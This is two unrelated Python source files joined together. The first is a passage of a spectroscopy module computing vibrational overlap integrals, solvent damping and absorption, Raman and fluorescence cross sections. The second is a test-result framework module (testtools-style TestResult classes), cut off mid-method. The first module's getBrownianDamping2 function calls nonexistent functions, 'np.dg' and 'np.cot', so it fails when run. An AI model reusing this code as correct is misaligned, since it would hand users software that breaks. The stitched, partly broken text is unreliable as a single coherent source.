:returns: 0-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (42) - (44).
"""
wg = eg / hbar
we = ee / hbar
swe = np.sin(we * t)
cwe = np.cos(we * t)
pt = we / wg * Delta * swe
qt = Delta * (1 - cwe)
# the log reduces to 0.5 * eg / hbar * t when eg = ee
# this is the factor that is taken out in the t00A case, as it cancels with the exp in the integral later on
# however, np.log returns values such that -pi < arg(log(..)) < pi
gt = 1j / 2.0 * np.log(1j * wg / we * swe + cwe) + pt * (qt - Delta) / 2.0 # skip -E0 t / hbar
# add the following term to recover t00A for eg = ee
gt = gt - 1j / 2.0 * np.log(1j * np.sin(wg * t) + np.cos(wg * t))
at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe)
a = at + 0.5
pp = pt - 2.0 * 1j * at * qt
gp = 1j * at * qt**2 - pt * qt + gt
return a**(-0.5) * np.exp(-pp**2 / (4.0 * a)) * np.exp(1j * gp)
def t10B(t, Delta, eg, ee):
"""Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with different ground and excited state vibrational frequencies.
:param array t: Time axis in (fs).
:param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
:param float eg: Vibrational frequency in the ground state (cm-1).
:param float ee: Vibrational frequency in the excited state (cm-1).
:returns: 1-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (42) - (44).
"""
wg = eg / hbar
we = ee / hbar
swe = np.sin(we * t)
cwe = np.cos(we * t)
pt = we / wg * Delta * swe
qt = Delta * (1 - cwe)
at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe)
a = at + 0.5
pp = pt - 2.0 * 1j * at * qt
return 2**(-0.5) * pp / (1j * a) # * t00B(t, Delta, eg, ee)
def t20B(t, Delta, eg, ee):
"""Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with different ground and excited state vibrational frequencies.
:param array t: Time axis in (fs).
:param float Delta: Displacement of excited state potential energy surface along this vibrational coordinate in dimensionless coordinates.
:param float eg: Vibrational frequency in the ground state (cm-1).
:param float ee: Vibrational frequency in the excited state (cm-1).
:returns: 2-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (42) - (44).
"""
wg = eg / hbar
we = ee / hbar
swe = np.sin(we * t)
cwe = np.cos(we * t)
pt = we / wg * Delta * swe
qt = Delta * (1 - cwe)
at = -0.5 * 1j * (1j * cwe - (we / wg) * swe) / (1j * (wg / we) * swe + cwe)
a = at + 0.5
pp = pt - 2.0 * 1j * at * qt
return -8**(-0.5) * (pp**2 / a**2 + 2. * (1. - 1. / a)) # * t00B(t, Delta, eg, ee)
def t00D(t, beta, eVIB):
"""Time dependent overlap integral between vibrational ground states of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate.
:param array t: Time axis in (fs).
:param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate).
:param float eVIB: Vibrational frequency (cm-1).
:returns: 0-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (52) - (54).
"""
tmp = (1.0 + 1j * eVIB / hbar * t / 2.0)**(-0.5) * np.exp(-beta**2 * (6 * t**2 + 1j * eVIB / hbar * t**3) / (24 * hbar**2))
tmp = tmp * np.exp(1j * eVIB / hbar * t / 2.0) # add this term to compensate for the -1j w t / 2 term coming from the FFt
return tmp
def t10D(t, beta, eVIB):
"""Time dependent overlap integral between vibrational ground and first excited state of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate.
:param array t: Time axis in (fs).
:param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate).
:param float eVIB: Vibrational frequency (cm-1).
:returns: 1-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (52) - (54).
"""
return -1j * 2**(-0.5) * (beta * t / hbar) # * t00D(t, beta, eVIB)
def t20D(t, beta, eVIB):
"""Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate.
:param array t: Time axis in (fs).
:param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate).
:param float eVIB: Vibrational frequency (cm-1).
:returns: 2-0 overlap integral as function of time (same shape as t).
.. seealso:: Myers, Eqs. (52) - (54).
"""
return -2**(-0.5) * (beta**2 * t**2 / (2.0 * hbar**2) - 1j * eVIB / hbar * t / (2.0 + 1j * eVIB / hbar * t)) # * t00D(t, beta, eVIB)
def getOverlaps(t, D, RMg, RMe, nquanta):
"""Calculate the time dependent overlap integrals / Franck-Condon factors :math:`<i|i(t)>_k` and :math:`<f|i(t)>_k`.
.. versionchanged:: 10-07-2015
Format of return value changed.
:param array t: Time axis in (fs).
:param array D: Array of N normalized displacements of excited state surfaces (deltas), or slope of linear dissociative excited state surface.
:param array RMg: N Raman ground state frequencies (cm-1).
:param array RMe: N Raman excited state frequencies (cm-1) or -1 if excited state surface is dissociative.
:param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0 (no excitation), 1 (fundamental), 2 (first overtone).
:returns: M + 2 - dimensional array containing the Rayleigh, fluorescence and M Raman overlaps.
"""
ovlps = []
N = len(D)
M = nquanta.shape[0]
# Frank-Condon factors <i|i(t)>_k and <f|i(t)>_k
FC0 = []
FC0p = []
FC1 = []
FC2 = []
for i in range(N):
if(RMg[i] == RMe[i]):
FC0.append(t00A(t, D[i], RMg[i]))
FC0p.append(FC0[-1]) # fluorescence overlap is identical to absorption overlap when frequencies are equal
FC1.append(t10A(t, D[i], RMg[i]))
FC2.append(t20A(t, D[i], RMg[i]))
elif(RMe[i] == -1):
FC0.append(t00D(t, D[i], RMg[i]))
FC0p.append(np.zeros(len(t))) # fluorescence is negligible from dissociative surface
FC1.append(t10D(t, D[i], RMg[i]))
FC2.append(t20D(t, D[i], RMg[i]))
else:
FC0.append(t00B(t, D[i], RMg[i], RMe[i]))
FC0p.append(t00B(t, D[i], RMe[i], RMg[i])) # fluorescence overlap has excited state and ground state Raman frequencies switched
FC1.append(t10B(t, D[i], RMg[i], RMe[i]))
FC2.append(t20B(t, D[i], RMg[i], RMe[i]))
# go to numpy array..
FC0 = np.array(FC0)
FC0p = np.array(FC0p)
FC1 = np.array(FC1)
FC2 = np.array(FC2)
# Rayleigh / absorption overlap
oabs = 1.0 + 0.0 * 1j # reuse this term for the raman overlaps
for i in range(N):
oabs = oabs * FC0[i]
ovlps.append(oabs)
# fluorescence overlap
o = 1.0 + 0.0 * 1j
for i in range(N):
o = o * FC0p[i]
ovlps.append(o)
# actual Raman overlaps
for j in range(M):
o = 1.0 * oabs # all raman modes are based on this product and additional terms given by the excited modes
for i in range(N):
if(nquanta[j][i] == 1):
o = o * FC1[i]
elif(nquanta[j][i] == 2):
o = o * FC2[i]
ovlps.append(o)
return ovlps
def getZeroZeroEnergy(t, E0):
"""Calculate the oscillation term in the time domain due to the electronic zero-zero energy E0.
:param array t: Time axis (fs).
:param float E0: Difference between excited and ground state vibrational ground state energies, *zero-zero energy* (cm-1).
"""
return np.exp(-1j * E0 / hbar * t)
def getHomogeneousDamping(t, Gamma, alpha=0, lmbda=0):
"""Calculates the damping term arising from the homogeneous linewidth of the electronic transition. Offers phenomenological support for Stokes shift.
.. note:: Added phenomenological Stokes shift to input parameters on 10-12-2015. See for example *New J Phys* **11**, 015001 (2009), Eqs. (1) and (2).
:param array t: Time axis (fs).
:param float Gamma: Decay rate according to :math:`1 / \\tau` in (cm-1), where :math:`tau` is exponential dephasing time.
:param float alpha: Line shape parameter:
- 1 = Gaussian
- 0 = Lorentzian
:param float lmbda: Phenomenological Stokes shift (cm-1) which is added as imaginary part to g(t). Compared to the Brownian oscillator models, lmbda **is** the observed Stokes shift. (default = 0)
:returns: Damping term in the time domain, :math:`e^{-g(t) - i \lambda t / 2 \hbar}`.
"""
g = alpha * (Gamma**2 / hbar**2 * t**2) + (1 - alpha) * (Gamma / hbar * t) + 1j * lmbda / 2.0 * t / hbar
return np.exp(-g)
def getKuboDamping(t, Delta, Lambda):
"""Calculates the damping term using Kubo's *stochastic model*. This model describes the broadening, but does not yield solvent induced Stokes shifts.
:param array t: Time axis (fs).
:param float Delta: Magnitude of solvent energy gap fluctuations (cm-1). This parameter also controls the effective line shape:
- Delta >> Lambda = Lorentzian
- Delta << Lambda = Gaussian
:param float Lambda: Effective frequency of solvent fluctuations (cm-1).
:returns: Damping term in the time domain, :math:`e^{-g(t)}`.
.. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997)
"""
return np.exp(-(Delta / Lambda)**2 * (np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0))
def getBrownianDamping(t, kappa, T, egamma, cutoff=1e-6):
"""Calculate the damping term using Mukamel's Brownian oscillator model based on Myers Fortran code. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift.
:param array t: Time axis (fs).
:param float kappa: Lineshape parameter:
- kappa >> 1 = Lorentzian,
- kappa << 1 = Gaussian.
:param float T: Temperature in K.
:param float egamma: Electronic homogeneous linewidth (**FWHM**, cm-1).
:param float cutoff: Cutoff for sum over Brownian oscillators. Typically between 1e-6 (default) and 1e-8. Check for convergence by re-running with different values.
:returns: Damping term in the time domain, :math:`e^{-g(t)}`.
.. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997)
"""
temp = np.absolute(T)
# ----------------------------------------------------------
# 1: derive Mukamel's parameters from kappa, temp and egamma
# I do not have a reference for this part - it's taken from Myers fortran code
# Boltzmann beta
beta = 1.0 / (kB * temp) # 1/cm-1
# some 'a' parameter (this comes from Myers Fortran program)
a = (2.355 + 1.76 * kappa) / (1.0 + 0.85 * kappa + 0.88 * kappa**2)
# these are Mukamel's parameters in Myers, J. Raman. Spec. 28, 389 (1997), eqs. (35) to (38)
Lambda = kappa * egamma / a # cm-1
lmbda = beta * (Lambda / kappa)**2 / 2.0 # cm-1
# ----------------------------------------------------------
# 2: calculate the sum over n Brownian oscillators
vs = np.zeros(len(t)) # this is the sum over the n oscillators as function of time in (cm-1)**-3
n = 0
while(True):
n = n + 1
vn = 2.0 * np.pi * n / beta # cm-1
vinc = (np.exp(-vn / hbar * t) + vn / hbar * t - 1) / (vn * (vn**2 - Lambda**2))
vs = vs + vinc
if(np.amax(np.absolute(vinc[1:] / vs[1:])) < cutoff): # the first element of vs is always 0
break
# ----------------------------------------------------------
# 3: calculate the damping function g(t)
gexp = np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0 # dimensionless
greal = (lmbda / Lambda) / np.tan(beta * Lambda / 2.0) * gexp # dimensionless
greal = greal + 4.0 * lmbda * Lambda / beta * vs # dimensionless
gimag = -(lmbda / Lambda) * gexp # dimensionless
g = greal + 1j * gimag # dimensionless
return np.exp(-g)
def getBrownianDamping2(t, lmbda, Lambda, T=298.0, cutoff=1e-6):
"""Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model.
The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift.
:param array t: Time axis in fs.
:param float lmbda: Solvent contribution to reorganization energy (cm-1).
:param float Lambda: Inverse of characteristic time scale for solvent fluctuations (fs-1).
:param float T: Temperature (K, default = 298 K).
:param float cutoff: Cutoff value for summation over brownian oscillators (default 1e-6).
:returns: Damping term in the time domain, :math:`e^{-g(t)}`.
.. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eqs. (10a) to (10d).
"""
beta = 1.0 / (kB * np.absolute(T))
lmb = lmbda / hbar # convert to fs-1
# calculate real part as sum over oscillators
gR = 0.0
i = 1.0
while(1):
nun = 2.0 * np.pi / (hbar * beta) * i # frequency of ith oscillator
dg = (np.exp(-nun * t) + nun * t - 1.0) / (nun * (nun**2 - Lambda**2))
gR = gR + dg
i = i + 1.0
if np.sum(np.absolute(np.dg)) / np.sum(np.absolute(gR)) < cutoff:
break
gR = gR * 4.0 * lmb * Lambda / (hbar * beta)
gR = gR + (lmb / Lambda) * np.cot(hbar * beta * Lambda / 2.0) * (np.exp(-Lambda * t) + Lambda * t - 1.0)
# calculate imaginary part = Stokes shift
gI = -(lmb / Lambda) * (np.exp(-Lambda * t) - 1.0)
# assemble
g = gR + 1j * gI # dimensionless
return np.exp(-g)
def getBrownianDampingSlowMod(t, lmbda, T=298.0):
"""Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model in the high-temperature and slow-modulation limit.
The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift.
:param array t: Time axis in fs.
:param float lmbda: Solvent contribution to reorganization energy (cm-1).
:param float T: Temperature (K, default = 298 K).
:returns: Damping term in the time domain, :math:`e^{-g(t)}`.
.. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eq. (11).
"""
lmb = lmbda / hbar # convert to fs-1
return np.exp(-(lmb * kB * np.absolute(T) * t**2 / hbar + 1j * lmb * t))
def applyInhomogeneousBroadening(wn, y, sig, alpha=1):
"""Convolute a spectrum with a Gaussian/Lorentzian to account for inhomogeneous broadening.
:param array wn: Frequency axis in same units as sig (cm-1).
:param array y: Input spectrum, same shape as wn.
:param float sig: Width of convolution function in same units as x (standard deviation of Gaussian distribution). Must not be zero.
:param float alpha: Lineshape parameter:
- 1 = Gaussian,
- 0 = Lorentzian.
:returns: Convoluted spectrum (same shape as y).
"""
ck = alpha / (sig * np.sqrt(2 * np.pi)) * np.exp(-(wn - (wn[-1] + wn[0]) / 2.0)**2 / (2.0 * sig**2))
ck += (1 - alpha) * sig / (np.pi * ((wn - (wn[-1] + wn[0]) / 2)**2 + sig**2))
# np.convolve uses a sum, whereas the function we want uses an integral; wn[1] - wn[0] is dwn
return (wn[1] - wn[0]) * np.convolve(y, ck, 'same')
def prefA(eEL, M, IOR, dt):
"""Return the prefactor for the absorption cross section calculation in (A**2 / molec).
:param array eEL: Laser excitation energy in (cm-1). May also be a single float value.
:param float M: Electronic transition dipole length in (A).
:param float IOR: Index of refraction of surrounding solvent / medium.
:param float dt: Time increment used for integration (fs).
:returns: Prefactor for absorption cross section calculation.
.. seealso:: Myers, Eq. (35).
"""
# to convert from esu to SI divide by 4 pi eps0
# the factor / 2 arises from the normalization of numpy of the rfft to match the amplitude of fft
# so rfft is not completely identical to half-sided FT integral
return 5.7579e-6 * M**2 * eEL * dt / IOR / 2.0
def prefR(eEL, M, eR, dt):
"""Return the prefactor for the Raman excitation profile calculation (A**2 / molec).
:param array eEL: Laser excitation energies in (cm-1). Can also be a single floating point value.
:param float M: Electronic transition dipole moment in (A).
:param float eR: Stokes shift of the Raman line in (cm-1).
:param float dt: Time increment for the integration (fs).
:returns: The prefactor for the Raman excitation profile calculation.
.. seealso:: Myers, Eq. (34) and following text.
"""
# get energy of stokes shifted photons
eES = eEL - eR
# the 1e-6 is for fs instead of ps in the integral and is consistent with Myers fortran code (it is different however from the 1e4 factor in Valley & Hoffman code!!)
# to convert from esu to SI divide by (4 pi eps0)**2
return 2.0831e-20 * 1e-6 * M**4 * eES**3 * eEL * dt**2
def prefF(eEF, M, IOR, dt):
"""Return the prefactor for the fluorescence efficiency calculation (unitless). See :py:func:`getCrossSections` for more details.
:param array eEF: Fluorescence energy in (cm-1). May also be a single float value.
:param float M: Electronic transition dipole length in (A).
:param float IOR: Index of refraction of surrounding solvent / medium.
:param float dt: Time increment used for integration (fs).
:returns: Prefactor for fluorescence efficiency calculation.
.. seealso:: Myers, *Chem. Phys.* **180**, 215 (1994), Eqs. (6) and (26).
"""
# to convert from esu to SI divide by 4 pi eps0
# the factor / 2 arises from the normalization of numpy of the rfft to match the amplitude of fft
# so rfft is not completely identical to half-sided FT integral
return 3.6656e-22 * IOR * M**2 * eEF**3 * dt / 2.0
def getCrossSections(t, wn, E0, ovlps, sshift, M, IOR, damp=1, sig=0, ialpha=1):
"""Calculate the absorption and Raman cross-sections and the fluorescence efficiency. The latter is a unitless quantity which may be used
to calculate the fluorescence rate (=rate of spontaneous emission) by integrating over the frequency axis (see Myers, *Chem. Phys.* **180**, 215 (1994) Eq. 6 and discussion).
.. note:: Changed shape of input parameters and shape of return values on 10-07-2015.
:param array t: Time axis in (fs). This axis is used for the calculation of the zero-zero energy term in the time domain.
:param array wn: Wavenumber axis in (cm-1). Same shape as t.
:param array E0: Zero-zero energy. This function then calculates the time domain part using `getZeroZeroEnergy`.
:param array ovlps: M + 2 Absorption, fluorescence and Raman overlap integrals.
:param float sshift: Vibrational freqencies of M Raman modes to calculate (cm-1).
:param float M: Electronic transition dipole length (A).
:param float IOR: Index of refraction of surrounding medium / solvent.
:param array damp: Damping function in the time domain. Same shape as t. Set to 1 if no damping is used (default).
:param float sig: Linewidth for inhomogeneous damping (standard deviation of Gaussian), set to zero if not used (default).
:param float ialpha: Lineshape parameter for inhomogeneous damping:
- 1 = Gaussian (default),
- 0 = Lorentzian.
:returns: Absorption (sigmaA), M Raman cross sections (sigmaR[M]), both in A**2 / mol., and fluorescence efficiency spectrum, kF (arrays have same shape as wn); all as function of excitation wavenumber.
"""
Npoints = len(wn)
dt = t[1] - t[0]
# caluclate zero-zero time domain part
tdpart = getZeroZeroEnergy(t, E0)
# absorption cross section - using the half sided FT (equivalent to rfft)
tmp = np.real(Npoints * np.fft.irfft(ovlps[0] * tdpart * damp, Npoints))
if(sig > 0):
tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha)
sigmaA = prefA(wn, M, IOR, dt) * tmp
# fluorescence rate / intensity - using half sided FT - similar to absorption
# in order to account for the sign change, the zero-zero energy time domain part and the damping term had to be separated;
# use the tdpart conjugated and change irfft by hfft to get the factor exp(-1j w t)
# numpy does not normalize the forward FFT, so no factor Npoints
tmp = np.real(np.fft.hfft(ovlps[1] * np.conjugate(tdpart) * damp, Npoints))
if(sig > 0):
tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha)
kF = prefF(wn, M, IOR, dt) * tmp
# Raman cross sections - using a standard FT
sigmaR = []
for i, ovlp in enumerate(ovlps[2:]): # iterate over all lines
tmp = np.absolute(Npoints * np.fft.ifft(ovlp * tdpart * damp, Npoints))**2 # use again the inverse transform to get "exp(1j w t)"
if(sig > 0):
tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha)
sigmaR.append(prefR(wn, M, sshift[i], dt) * tmp)
return sigmaA, sigmaR, kF
|
"""Test results and related things."""
__metaclass__ = type
__all__ = [
'ExtendedToOriginalDecorator',
'MultiTestResult',
'TestResult',
'ThreadsafeForwardingResult',
]
import datetime
import sys
import unittest
from testtools.compat import all, _format_exc_info, str_is_unicode, _u
_ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return _ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return _ZERO
utc = UTC()
class TestResult(unittest.TestResult):
"""Subclass of unittest.TestResult extending the protocol for flexability.
This test result supports an experimental protocol for providing additional
data to in test outcomes. All the outcome methods take an optional dict
'details'. If supplied any other detail parameters like 'err' or 'reason'
should not be provided. The details dict is a mapping from names to
MIME content objects (see testtools.content). This permits attaching
tracebacks, log files, or even large objects like databases that were
part of the test fixture. Until this API is accepted into upstream
Python it is considered experimental: it may be replaced at any point
by a newer version more in line with upstream Python. Compatibility would
be aimed for in this case, but may not be possible.
:ivar skip_reasons: A dict of skip-reasons -> list of tests. See addSkip.
"""
def __init__(self):
# startTestRun resets all attributes, and older clients don't know to
# call startTestRun, so it is called once here.
# Because subclasses may reasonably not expect this, we call the
# specific version we want to run.
TestResult.startTestRun(self)
def addExpectedFailure(self, test, err=None, details=None):
"""Called when a test has failed in an expected manner.
Like with addSuccess and addError, testStopped should still be called.
:param test: The test that has been skipped.
:param err: The exc_info of the error that was raised.
:return: None
"""
# This is the python 2.7 implementation
self.expectedFailures.append(
(test, self._err_details_to_string(test, err, details)))
def addError(self, test, err=None, details=None):
"""Called when an error has occurred. 'err' is a tuple of values as
returned by sys.exc_info().
:param details: Alternative way to supply details about the outcome.
see the class docstring for more information.
"""
self.errors.append((test,
self._err_details_to_string(test, err, details)))
def addFailure(self, test, err=None, details=None):
"""Called when an error has occurred. 'err' is a tuple of values as
returned by sys.exc_info().
:param details: Alternative way to supply details about the outcome.
see the class docstring for more information.
"""
self.failures.append((test,
self._err_details_to_string(test, err, details)))
def addSkip(self, test, reason=None, details=None):
"""Called when a test has been skipped rather than running.
Like with addSuccess and addError, testStopped should still be called.
This must be called by the TestCase. 'addError' and 'addFailure' will
not call addSkip, since they have no assumptions about the kind of
errors that a test can raise.
:param test: The test that has been skipped.
:param reason: The reason for the test being skipped. For instance,
u"pyGL is not available".
:param details: Alternative way to supply details about the outcome.
see the class docstring for more information.
:return: None
"""
if reason is None:
reason = details.get('reason')
if reason is None:
reason = 'No reason given'
else:
reason = ''.join(reason.iter_text())
skip_list = self.skip_reasons.setdefault(reason, [])
skip_list.append(test)
def addSuccess(self, test, details=None):
"""Called when a test succeeded."""
def addUnexpectedSuccess(self, test, details=None):
"""Called when a test was expected to fail, but succeed."""
self.unexpectedSuccesses.append(test)
def wasSuccessful(self):
"""Has this result been successful so far?
If there have been any errors, failures or unexpected successes,
return False. Otherwise, return True.
Note: This differs from standard unittest in that we consider
unexpected successes to be equivalent to failures, rather than
successes.
"""
return not (self.errors or self.failures or self.unexpectedSuccesses)
if str_is_unicode:
# Python 3 and IronPython strings are unicode, use parent class method
_exc_info_to_unicode = unittest.TestResult._exc_info_to_string
else:
# For Python 2, need to decode components of traceback according to
# their source, so can't use traceback.format_exception
# Here follows a little deep magic to copy the existing method and
# replace the formatter with one that returns unicode instead
from types import FunctionType as __F, ModuleType as __M
__f = unittest.TestResult._exc_info_to_string.im_func
__g = dict(__f.func_globals)
__m = __M("__fake_traceback")
__m.format_exception = _format_exc_info
__g["traceback"] = __m
_exc_info_to_unicode = __F(__f.func_code, __g, "_exc_info_to_unicode")
del __F, __M, __f, __g, __m
def _err_details_to_string(self, test, err=None, details=None):
"""Convert an error in exc_info form or a contents dict to a string."""
if err is not None:
return self._exc_info_to_unicode(err, test)
return _details_to_str(details, special='traceback')
def _now(self):
"""Return the current 'test time'.
If the time() method has not been called, this is equivalent to
datetime.now(), otherwise its the last supplied datestamp given to the
time() method.
"""
if self.__now is None:
return datetime.datetime.now(utc)
else:
return self.__now
def startTestRun(self):
"""Called before a test run starts.
New in Python 2.7. The testtools version resets the result to a
pristine condition ready for use in another test run. Note that this
is different from Python 2.7's startTestRun, which does nothing.
"""
super(TestResult, self).__init__()
self.skip_reasons = {}
self.__now = None
# -- Start: As per python 2.7 --
self.expectedFailures = []
self.unexpectedSuccesses = []
# -- End: As per python 2.7 --
def stopTestRun(self):
"""Called after a test run completes
New in python 2.7
"""
def time(self, a_datetime):
"""Provide a timestamp to represent the current time.
This is useful when test activity is time delayed, or happening
concurrently and getting the system time between API calls will not
accurately represent the duration of tests (or the whole run).
Calling time() sets the datetime used by the TestResult object.
Time is permitted to go backwards when using this call.
:param a_datetime: A datetime.datetime object with TZ information or
None to reset the TestResult to gathering time from the system.
"""
self.__now = a_datetime
def done(self):
"""Called when the test runner is done.
deprecated in favour of stopTestRun.
"""
class MultiTestResult(TestResult):
"""A test result that dispatches to many test results."""
def __init__(self, *results):
TestResult.__init__(self)
self._results = list(map(ExtendedToOriginalDecorator, results))
def __repr__(self):
return '<%s (%s)>' % (
self.__class__.__name__, ', '.join(map(repr, self._results)))
def _dispatch(self, message, *args, **kwargs):
return tuple(
getattr(result, message)(*args, **kwargs)
for result in self._results)
def startTest(self, test):
return self._dispatch('startTest', test)
def stopTest(self, test):
return self._dispatch('stopTest', test)
def addError(self, test, error=None, details=None):
return self._dispatch('addError', test, error, details=details)
def addExpectedFailure(self, test, err=None, details=None):
return self._dispatch(
'addExpectedFailure', test, err, details=details)
def addFailure(self, test, err=None, details=None):
return self._dispatch('addFailure', test, err, details=details)
def addSkip(self, test, reason=None, details=None):
return self._dispatch('addSkip', test, reason, details=details)
def addSuccess(self, test, details=None):
return self._dispatch('addSuccess', test, details=details)
def addUnexpectedSuccess(self, test, details=None):
return self._dispatch('addUnexpectedSuccess', test, details=details)
def startTestRun(self):
return self._dispatch('startTestRun')
def stopTestRun(self):
return self._dispatch('stopTestRun')
def time(self, a_datetime):
return self._dispatch('time', a_datetime)
def done(self):
return self._dispatch('done')
def wasSuccessful(self):
"""Was this result successful?
Only returns True if every constituent result was successful.
"""
return all(self._dispatch('wasSuccessful'))
class TextTestResult(TestResult):
"""A TestResult which outputs activity to a text stream."""
def __init__(self, stream):
"""Construct a TextTestResult writing to stream."""
super(TextTestResult, self).__init__()
self.stream = stream
self.sep1 = '=' * 70 + '\n'
self.sep2 = '-' * 70 + '\n'
def _delta_to_float(self, a_timedelta):
return (a_timedelta.days * 86400.0 + a_timedelta.seconds +
a_timedelta.microseconds / 1000000.0)
def _show_list(self, label, error_list):
for test, output in error_list:
self.stream.write(self.sep1)
self.stream.write("%s: %s\n" % (label, test.id()))
self.stream.write(self.sep2)
self.stream.write(output)
def startTestRun(self):
super(TextTestResult, self).startTestRun()
self.__start = self._now()
self.stream.write("Tests running...\n")
def stopTestRun(self):
if self.testsRun != 1:
plural = 's'
else:
plural = ''
stop = self._now()
self._show_list('ERROR', self.errors)
self._show_list('FAIL', self.failures)
for test in self.unexpectedSuccesses:
self.stream.write(
"%sUNEXPECTED SUCCESS: %s\n%s" % (
self.sep1, test.id(), self.sep2))
self.stream.write("\nRan %d test%s in %.3fs\n" %
(self.testsRun, plural,
self._delta_to_float(stop - self.__start)))
if self.wasSuccessful():
self.stream.write("OK\n")
else:
self.stream.write("FAILED (")
details = []
details.append("failures=%d" % (
sum(map(len, (
self.failures, self.errors, self.unexpectedSuccesses)))))
self.stream.write(", ".join(details))
self.stream.write(")\n")
super(TextTestResult, self).stopTestRun()
class ThreadsafeForwardingResult(TestResult):
"""A TestResult which ensures the target does not receive mixed up calls.
This is used when receiving test results from multiple sources, and batches
up all the activity for a single test into a thread-safe batch where all
other ThreadsafeForwardingResult objects sharing the same semaphore will be
locked out.
Typical use of ThreadsafeForwardingResult involves creating one
ThreadsafeForwardingResult per thread in a ConcurrentTestSuite. These
forward to the TestResult that the ConcurrentTestSuite run method was
called with.
target.done() is called once for each ThreadsafeForwardingResult that
forwards to the same target. If the target's done() takes special action,
care should be taken to accommodate this.
"""
def __init__(self, target, semaphore):
"""Create a ThreadsafeForwardingResult forwarding to target.
:param target: A TestResult.
:param semaphore: A threading.Semaphore with limit 1.
"""
TestResult.__init__(self)
self.result = ExtendedToOriginalDecorator(target)
self.semaphore = semaphore
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self.result)
def _add_result_with_semaphore(self, method, test, *args, **kwargs):
self.semaphore.acquire()
try:
self.result.time(self._test_start)
self.result.startTest(test)
self.result.time(self._now())
try:
method(test, *args, **kwargs)
finally:
self.result.stopTest(test)
finally:
self.semaphore.release()
def addError(self, test, err=None, details=None):
self._add_result_with_semaphore(self.result.addError,
test, err, details=details)
def addExpectedFailure(self, test, err=None, details=None):
self._add_result_with_semaphore(self.result.addExpectedFailure,
test, err, details=details)
def addFailure(self, test, err=None, details=None):
self._add_result_with_semaphore(self.result.addFailure,
test, err, details=details)
def addSkip(self, test, reason=None, details=None):
self._add_result_with_semaphore(self.result.addSkip,
test, reason, details=details)
def addSuccess(self, test, details=None):
self._add_result_with_semaphore(self.result.addSuccess,
test, details=details)
def addUnexpectedSuccess(self, test, details=None):
self._add_result_with_semaphore(self.result.addUnexpectedSuccess,
test, details=details)
def startTestRun(self):
self.semaphore.acquire()
try:
self.result.startTestRun()
finally:
self.semaphore.release()
def stopTestRun(self):
self.semaphore.acquire()
try:
self.result.stopTestRun()
finally:
self.semaphore.release()
def done(self):
self.semaphore.acquire()
try:
self.result.done()
finally:
self.semaphore.release()
def startTest(self, test):
self._test_start = self._now()
super(ThreadsafeForwardingResult, self).startTest(test)
def wasSuccessful(self):
return self.result.wasSuccessful()
class ExtendedToOriginalDecorator(object):
"""Permit new TestResult API code to degrade gracefully with old results.
This decorates an existing TestResult and converts missing outcomes
such as addSkip to older outcomes such as addSuccess. It also supports
the extended details protocol. In all cases the most recent protocol
is attempted first, and fallbacks only occur when the decorated result
does not support the newer style of calling.
"""
def __init__(self, decorated):
self.decorated = decorated
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self.decorated)
def __getattr__(self, name):
return getattr(self.decorated, name)
def addError(self, test, err=None, details=None):
self._check_args(err, details)
if details is not None:
try:
return self.decorated.addError(test, details=details)
except TypeError:
# have to convert
err = self._details_to_exc_info(details)
return self.decorated.addError(test, err)
def addExpectedFailure(self, test, err=None, details=None):
self._check_args(err, details)
addExpectedFailure = getattr(
self.decorated, 'addExpectedFailure', None)
if addExpectedFailure is None:
return self.addSuccess(test)
if details is not None:
try:
return addExpectedFailure(test, details=details)
except TypeError:
# have to convert
err = self._details_to_exc_info(details)
return addExpectedFailure(test, err)
def addFailure(self, test, err=None, details=None):
self._check_args(err, details)
if details is not None:
try:
return self.decorated.addFailure(test, details=details)
except TypeError:
# have to convert
err = self._details_to_exc_info(details)
return self.decorated.addFailure(test, err)
def addSkip(self, test, reason=None, details=None):
self._check_args(reason, details)
addSkip = getattr(self.decorated, 'addSkip', None)
if addSkip is None:
return self.decorated.addSuccess(test)
if details is not None:
try:
return addSkip(test, details=details)
except TypeError:
# extract the reason if it's available
try:
reason = ''.join(details['reason'].iter_text())
except KeyError:
reason = _details_to_str(details)
return addSkip(test, reason)
